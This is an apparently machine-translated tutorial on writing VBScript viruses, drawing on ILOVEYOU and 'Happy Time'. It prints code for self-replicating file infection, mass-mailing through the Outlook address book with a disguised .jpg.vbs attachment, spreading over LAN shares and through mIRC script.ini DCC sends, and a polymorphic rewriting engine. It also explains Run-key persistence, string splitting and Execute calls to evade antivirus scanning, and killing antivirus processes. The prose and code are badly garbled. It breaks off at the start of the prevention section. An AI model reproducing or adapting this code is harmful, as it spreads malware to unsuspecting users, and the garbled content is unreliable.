The popularity of the network makes our world more beautiful, but it is also unpleasant. When you receive an email with the topic "I love you", when you use excited to click on the attachment; after you browse a trusted website, you find that the speed of opening each folder is very slow. When do you detect that the virus has broke into your world? "Macrovirus" network worm virus broke out in Europe and the United States on May 4, 2000. Due to the propagation of the email system, the macro virus frenzies millions of computers around the world in just a few days. Many large enterprise network systems, including Microsoft, Intel, etc., and global economic losses reached billions of dollars. The new joyful time viruses that broke out last year have made the majority of computer users even more bitter.
One of the two viruses mentioned above is: Writing using VBScript. The VBS script virus is very rampant with a typical representative of the Macrovirus and a new joyful time virus, and one is very important to write simple. Below we will analyze all aspects of VBS script virus one by one:
I. Characteristics and development status of VBS script virus
The VBS virus is written in VB Script. This script language is very powerful. They use the open features of the Windows system. By calling some ready-made Windows objects, components, they can directly control file systems, registry, etc. powerful. It should be said that virus is a kind of thought, but this idea is extremely easy to use VBS implementation. The VBS script virus has the following features:
1. Write simple, a virus enthusiast who has not known to the virus can have a new virus in a short period of time.
2. The destructive power is large. Its destructive power is not only manifested in the destruction of user system files and performance. He can also crash the mail server, and the network occurs seriously.
3. Strengthening infection. Since the script is performed directly, and it does not need to do a complex PE file format, such viruses can be directly infected with other similar files directly by self-replication, and the exception handling is very easy. .
4. The propagation range is large. Such viruses can be spread all over the world in a short period of time through HTM documents, Email accessories or other means.
5. Virus source code is easily acquired and varies. Since the VBS virus interpretation is performed, the source code readability is very strong, even after the viral source is encrypted, the acquisition of its source code is still relatively simple. Therefore, this type of virus variant is more, slightly changed the structure of the virus, or modify the characteristic value, many anti-virus software may not force.
6. Strong deceptive. Script virus often uses a variety of means to make users not pay attention to, for example, the attachment name of the message uses a double suffix, such as .jpg.vbs, because the system does not display the suffix, so that the user sees this file When you think it is a JPG image file.
7. It is very easy to achieve the virus production machine. The so-called virus production machine is the need to produce viral machines according to the user's will. (Of course, the current virus production machine, most of which is the script virus production machine, the most important point is because The script is explained, it is very easy to implement, and it will be discussed later.
Because of the above features, script virus is extremely rapid, especially the emergence of viral production machines, making it very easy to generate new script viruses.
Second, VBS script virus principle analysis
1. How to infect VBS script virus, search for files
VBS script viruses are generally directly infected with self-replication. Most of the code in the virus can be attached to the middle of other similar programs, such as new joyful time viruses can attach their own code to the end of the .htm file, And add a statement that calls the virus code, and the macro-virus is directly generated a copy of the file, copy the virus code into it, and the original file name as the prefix of the viral file name, VBS as a suffix. Below we have concluded part of the macro virus to analyze the infection and search principle of such viruses: The following is some of the key code of file infection:
SET FSO = CreateObject ("scripting.filesystemObject")
'Creating a file system object
Set self = fso.opentextfile (wscript.scriptfullname, 1)
'Read the current file (ie, the virus itself)
vbscopy = self.readall
'Read the virus all code to the string variable VBScopy ...
SET AP = fso.opentextfile (Target file .path, 2, true)
'Write open target files, ready to write viral code
AP.WRITE VBSCOPY 'covers the target file
ap.close
SET COP = fso.getfile (Target file .path) 'get the target file path
Cop.copy (Target file .path & ".vbs")
'Creating another virus file (with .vbs as a suffix)
Target file. Delete (true)
'Delete the target file
The above describes how the virus file is infected with normal file: first assume the virus itself to the string variable vbscopy, then overwritten this string to the target file, and create a target file name to file name prefix, VBS is a suffix The file copy, finally delete the target file.
Below we are specifically analyzing the file search code:
'This function is mainly used to find files that meet the conditions and generate a viral copy of the corresponding file.
SUB SCAN (Folder_) 'scan function definition,
On Error ResMe next 'If an error occurs, skip directly and prevent the pop-out error window
Set folder_ = fso.getfolder (Folder_)
Set files = folder_.files' Current Directory All File Collection
For each file in filesext = fso.getextensionName (file)
'Get file suffixes
Ext = lcase (ext) 'suffix name converted into lowercase letters
If ext = "mp5" Then 'If the retrore is MP5, infection is performed.
Please build the files of the corresponding retrore, it is best to make a bad hyperfix name so as not to destroy the normal procedure.
WScript.echo (file)
End ifnextSet Subfolders = folder_.subfoldersfor Each Subfolder In Subfolders' Search for other directory; recursive call
Scan () SCAN (Subfolder)
NEXT
End Sub
The above code is the code analysis of the VBS script virus for file search. Search section of the SCAN () function is relatively short, very clever, and uses a recursive algorithm to traverse the entire partition directory and file.
2. Several methods and code analysis of VBS script viruses through network communication
VBS script virus spreads widely, mainly on its network communication function, in general, VBS script viruses use the following ways: 1) Communicate via Email attachment
This is a very common way of communication. The virus can get a legal email address through various methods. The most common is to directly take the email address in the Outlook address book, or you can pass the program in user documentation (such as HTM file) Search for the Email address.
Below we specifically analyze how the VBS script virus does this:
Function Mailbroadcast ()
ON Error ResMe next
WScript.echo
Set OutlookApp = CreateObject ("Outlook.Application")
// Create an object of an Outlook application
IF OutlookApp = "Outlook" then
Set mapiobj = Outlookapp.getnamespace ("MAPI")
/ / Get the namespace of MAPI
Set addrlist = mapiobj.addresslists
/ / Get the number of address tables
For Each Addr in Addrlist
If addr.addressentries.count <> 0 THEN
AddRentcount = addr.addressentries.count
/ / Get the number of Email records for each address table
For addrentIndex = 1 to addrentcount
// Traverse the email address of the address table
Set item = OutlookApp.createItem (0)
// Get a mail object instance
Set addrent = addr.addressentries (addrentIndex)
/ / Get the specific email address
item.to = addrent.address
// Fill in the recipient address
Item.subject = "Viral Communication Experiment"
// Write an email title
Item.body = "Here is the viral email propagation test, you should not panic!
"// write file content
Set attachments = item.attachments // Define the email attachment
Attachments.add FileSysobj.getspecialFolder (0) & "/ Test.jpg.vbs"
item.deleteafTERSUBMIT = TRUE
// Automatically delete after submission
IF item.to <> "" ""
item.send
//send email
Shellobj.Regwrite "HKCU / Software / MailTest / MAILED", "1"
// virus mark to avoid repeated infection
END IF
NEXTEND IFNEXT
END IF
END FUNCTION
2) Sharing communication through local area network
LAN sharing dissemination is also a very common and effective network propagation approach. In general, in order to communicate in the LAN, there must be many shared directories, and have optional permissions, such as Win2000 creation sharing, the default is to have writable rights. Such a virus can spread the virus code into these directories by searching for these shared directories.
In VBS, there is an object to implement a search and file operation of the online neighbor sharing folder. We use this object to achieve the purpose of propagation.
Welcome_msg = "Network Connection Search Test"
Set wshnetwork = wscript.createObject ("wscript.network") "Create a network object
Set opters = WSHNETWORK.EnumprinterConnections
'Creating a network printer connection list
WScript.echo "Network Printer Mappings:"
For i = 0 to oprinters.count - 1STEP2
'Display network printer connection
WScript.echo "Port" & opgerinTers.Item (i)
& "=" & oprinters.Item (i 1)
NEXT
SET COLDRIVES = WSHNETWORK.EnumNetworkDrives
'Creating a web shared connection list
If Coldrives.count = 0 THEN
MsgBox "There is no driver that can be listed.",
Vbinformation Vbokonly, Welcome_MSG
Else
STRMSG = "Current network drive connection:" & CRLF
Fori = 0to Coldrives.count - 1 Step 2
Strmsg = strmsg & chr (13) & chr (10) & Coldrives (i)
& Chr (9) & Coldrives (i 1)
NEXT
Msgbox strmsg, vbinformation vbokonly,
Welcome_msg 'Displays the current network drive connection
END IF
The above is a full scriptor used to find current printer connections and network sharing connectivity and display them. After you know the shared connection, we can read and write files directly.
3) Communicate through web files such as HTM, ASP, JSP, PHP
Today, WWW services have become very common, viruses must cause all user machine infectious viruses that have visited the web page by infection with HTM.
The reason why viruses can play a powerful function in the HTM document, using the same principle as the vast majority of web malicious code. Basically, they use the same code, but other code can be used, this code is the key to the virus FSO, WSH and other objects to run in the web page. In the registry hkey_classes_root / clsid / we can find such a primary key {F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}, the registry is "Windows Script Host Shell Object", the same, we can also find { 0D43FE01-F093-11CF-8940-00A0C9054228}, the registry is "FileSystem object", which generally initialize COM, after obtaining the corresponding component object, the virus can correctly use FSO, WSH two Object, call their powerful features. The code is as follows:
Set apple0bject = document.applets ("kj_guest") Apple0bject.setClsid ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}) Apple0bject.createInstance () 'creates an instance
SET WSSHELL Apple0bject.get0bject ()
Apple0bject.SetClsid ("{0D43FE01-F093-11CF-8940-00A0C9054228}")
Apple0bject.createInstance () 'Create an instance
SET FSO = Apple0bject.get0bject ()
For other types of files, this is no longer analyzed.
4) Communicate through IRC chat channel
The virus spreads through IRC generally uses the following code (take MIRC as an example)
DIM MIRC
SET FSO = CreateObject ("scripting.filesystemObject")
Set mirc = fso.createteTextFile ("c: /mirc/script.ini")
'Creating a file Script.ini
Fso.copyfile wscript.scriptfullname, "c: /mirc/attachment.vbs",
True 'Back up the virus file to attachment.vbs
mirc.writeLine "[script]"
mirc.writeline "N0 = on 1: join: *. *:
{IF ($ Nick! = $ ME) {halt} / dcc send $ nick c: /mirc/attachment.vbs}
'Transport virus files to other users in the channel with command / DDC send $ nick attachment.vbs
mirc.close
The above code is written to a row code in the Script.ini file, and many other code will be written in actually. Script.ini stores commands used to control the IRC session, which can be performed automatically. For example, Tune.vbs virus will modify C: /Mirc/script.ini and C: /mirc/mirc.ini, so that whenever IRC users use infected channels, they receive a Tune.vbs sent via DDC. . Similarly, if PIRCH98 is installed in the C: / PIRCH98 directory of the target computer, the virus will modify C: /PIRCH98/Events.ini and C: /PIRCH98/Pirch98.ini, so that whenever IRC users use infected channels They will receive a Tune.vbs sent via DDC.
In addition, viruses can also be propagated through a wide popular Kazaa. The virus copies the virus file into the default shared directory of Kazaa, so that when other users access this machine, it is possible to download the virus file and execute. This propagation method may take action with the popularity of Kazaa's point-to-point sharing tool.
There are some other propagation methods, we will not be one by one here.
3. How to get control power of VBS script virus
How to get control? This is a more interesting topic, while the VBS script virus seems to play this topic. The author lists several typical methods:
1) Modify the registry key
Windows automatically loads the procedures for the key values under the hkey_local_machine / suffware / microsoft / windows / currentversion / RUN item. Script virus can join a key value to point to virus programs under this, so that the control will be guaranteed when the machine is started. The method of modifying the reservoir is relatively simple, and can call the following statement directly. Wsh.regWrite (Strname, AnyValue [, stroyal])
2) Perform mode by mapping file
For example, our new joy time changes the execution of the DLL to WScript.exe. You can even point the map of the EXE file to virological code.
3) Deceive users and let users do their own
This method is actually related to the user's psychology. For example, the virus uses a two-suffix file name when sending an accessory. Since the suffix is not displayed by default, an example is displayed as beauty.jpg, when the user is often Will treat it as a picture to click. Similarly, for the user's own disk, the virus is infected, the file name of the original file is used as a prefix, and the VBS produces a viral file as a suffix, and deletes the original file, so that the user may put this VBS file. See the original file run. 4) Desktop.ini and Folder.htt cooperate with each other
These two files can be used to configure the active desktop or from the definition folder. If the user's directory contains these two files, the viral code in Folder.htt is triggered when the user enters the directory. This is a method of more effective acquisition control using a new joyful time virus. And using Folder.htt, it is also possible to trigger an EXE file, which may also become an effective way to get control of the virus!
There are still many ways to obtain control of the virus, and the rest of this is also relatively large.
4. Several techniques against VBS script viruses against anti-virus software
The ability of viruses to survive and anti-anti-virus software is also necessary. In general, the VBS script virus uses the following methods for anti-virus software:
1) Self-encryption
For example, a new happy time virus, it can randomly select the key to encrypt the part of your own code, so that each infected virus code is different, reaching the effect of polymorphism. This brings some difficulties to the traditional feature value. The virus can also be further used in deformation techniques such that the code after the decryption of the encrypted virus after infection is different.
Look at a simple VBS script deformation engine (from Flyshadow)
Randomize
Set of = createObject ("scripting.filesystemObject")
'Creating a file system object
Vc = of.opentextfile (wscript.scriptfullname, 1) .readall
'Read your own code
FS = Array ("of", "vc", "fs", "fsc")
'Define an array that is about to be replaced characters
For fsc = 0 to 3
VC = Replace (VC, FS (FSC), CHR ((int (RND * 22) 65)))
& Chr ((IND * 22) 65) & chr ((int (rND * 22) 65)))))
& Chr ((INT * 22) 65)))))))
'Take 4 random characters to replace the string in the fs FS
NEXT
Of.opentextFile (WScript.Scriptfullname, 2, 1) .writeline VC 'writes the replaced code back to the file
The above code allows the VBS file to replace the random string after each run, and the FSC four strings are replaced by a random string, which greatly prevents the anti-virus software from taking the characteristics Take it isolated.
2) Smart to use the Execute function
Whether friends who have used VBS programs will feel surprises: When a FileSystemObject object is used in a normal program, some anti-virus software reports when scanning this program, the risk of this VBS file is high, but some VBS scripts The virus also uses the FileSystemObject object, why didn't there any warning? The reason is very simple, because these viruses are cleverly use the Execute method. Some anti-virus software detects the VBS virus, it will check if the file in the program uses the FileSystemObject object. If it is adopted, this will issue alarm. If the virus converts this declaration code into a string, then execute through the Execute (String) function, you can avoid some anti-virus software. 3) Change the declaration method of certain objects
Such as fso = createObject ("scripting.filesystemObject"), we change it to
FSO = CREATEOBJECT ("Script" "ING.FILESYSTE" "MOBJECT"), so that the FileSystemObject object will not be found when the anti-virus software is static.
4) Turn off the anti-virus software directly
VBS script is powerful, it can be directly compared to the process name directly, if it is found to be anti-virus software, and some key programs are deleted.
5. Principle of VBS virus production machine
The so-called virus production machine refers to software that can generate a disease source code directly according to the user's choice. In many people, this may be incredible, in fact, its implementation is very simple for script viruses.
The scripting language is interpreted, does not need to be compiled, no checksum positioning in the program, and the separation between each statement is relatively clear. In this way, the virus function is first made into a number of separate modules. After the user is selected, the production machine only needs to patch up the corresponding function module, and finally make the corresponding code replacement and optimization. Due to space relationships and other reasons, this is not described in detail.
Third, how to prevent VBS script viruses
1. How to extract (encrypt) script virus from samples
For a script virus without encrypted, we can find directly from the virus sample, now introduce how to extract the encrypted VBS script virus from the virus sample, here we take a new happy time as an example.
Open Folder.htt with Jediedit. We found that this document is only 93 lines, first line, after a few lines of comments, start, and tail. I believe everyone knows this type of file!
Chapter 87 to 91 lines, is the following statement:
